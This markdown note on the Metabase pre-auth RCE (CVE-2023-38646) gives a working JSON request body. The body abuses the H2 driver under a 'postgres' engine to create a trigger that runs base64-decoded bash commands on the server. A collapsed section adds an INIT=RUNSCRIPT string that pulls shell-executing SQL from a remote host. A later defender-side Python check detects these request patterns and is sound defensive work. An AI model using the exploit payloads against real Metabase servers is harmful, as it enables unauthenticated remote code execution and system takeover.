# Metabase postgres (org.h2.Driver) RCE without INIT

### Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained [here](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)

This helped me to avoid errors related to "database already in use" (with H2 and postgres as engines).
```json
{
  "token": "TOKEN",
  "details": {
    "is_on_demand": false,
    "is_full_sync": false,
    "is_sample": false,
    "cache_ttl": null,
    "refingerprint": false,
    "auto_run_queries": true,
    "schedules": {},
    "details": {
      "advanced-options": true,
      "classname": "org.h2.Driver",
      "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
      "subprotocol": "h2"
    },
    "engine": "postgres",
    "name": "x"
  }
}
```
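Instead of using h2 directly as the engine with the INIT script, which is removed from our queries, we still use the database query for the h2 engine: `engine` is set to `postgres` while `classname` and `subprotocol` point at the H2 driver.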
<details>
<summary>INIT script</summary>
<code>mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'</code>
<h3>In the .sql you specify the way to exec shell commands</h3>
</details>
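
A defender-side check for the pattern above, added here as an example (not code from the original note or from Metabase): it flags JSON request bodies whose declared `engine` disagrees with an H2 `classname`/`subprotocol`, or whose H2 connection string carries code-executing tokens. The function names, finding labels, sample bodies and the `db` key are assumptions made for illustration.

```python
import json
import re

# Tokens that make an H2 JDBC string run SQL or script code when it connects.
H2_CODE_TOKENS = re.compile(r"INIT\s*=|RUNSCRIPT|CREATE\s+(?:TRIGGER|ALIAS)|\$\$", re.I)

def walk(obj):
    """Yield (key, value) for every scalar inside a nested JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if isinstance(value, (dict, list)):
                yield from walk(value)
            else:
                yield key, value
    elif isinstance(obj, list):
        for value in obj:
            yield from walk(value)

def audit_body(raw_body):
    """Return findings for one JSON request body; an empty list means clean."""
    try:
        body = json.loads(raw_body)
    except (TypeError, ValueError):
        return ["unparseable-json"]
    scalars = [(key, str(value)) for key, value in walk(body)]
    engines = {value.lower() for key, value in scalars if key == "engine"}
    h2_driver = any(
        (key == "classname" and value.lower().startswith("org.h2."))
        or (key == "subprotocol" and value.lower() == "h2")
        for key, value in scalars)
    findings = []
    if h2_driver and engines - {"h2"}:  # declared engine disagrees with the driver
        findings.append("h2-driver-under-other-engine")
    if (h2_driver or "h2" in engines) and any(
            H2_CODE_TOKENS.search(value) for _, value in scalars):
        findings.append("h2-code-in-connection-string")
    return findings

# Constructed sample bodies (not captured traffic); script content is redacted.
SAMPLE_MISMATCH = json.dumps({"token": "TOKEN", "details": {
    "engine": "postgres", "name": "x", "details": {
        "classname": "org.h2.Driver", "subprotocol": "h2",
        "subname": "./metabase.jar;CREATE TRIGGER t BEFORE SELECT ON "
                   "INFORMATION_SCHEMA.TABLES AS $$REDACTED$$"}}})
# "db" as the key holding the H2 string is an assumption; the page shows only the value.
SAMPLE_INIT = json.dumps({"token": "TOKEN", "details": {
    "engine": "h2", "details": {"db": "mem;test;INIT=RUNSCRIPT FROM 'REDACTED'"}}})
SAMPLE_BENIGN = json.dumps({"token": "TOKEN", "details": {
    "engine": "postgres", "details": {"host": "db.example.internal", "port": 5432}}})
```

Feed `audit_body` the request bodies recorded by a reverse proxy or WAF in front of Metabase; any non-empty result on a database-connection request deserves review.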
# REFERENCE
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase
### Written as a note; take it as vague documentation. You must have authorization to enumerate, exploit or simply test against any target.
## Comments and contributions are welcome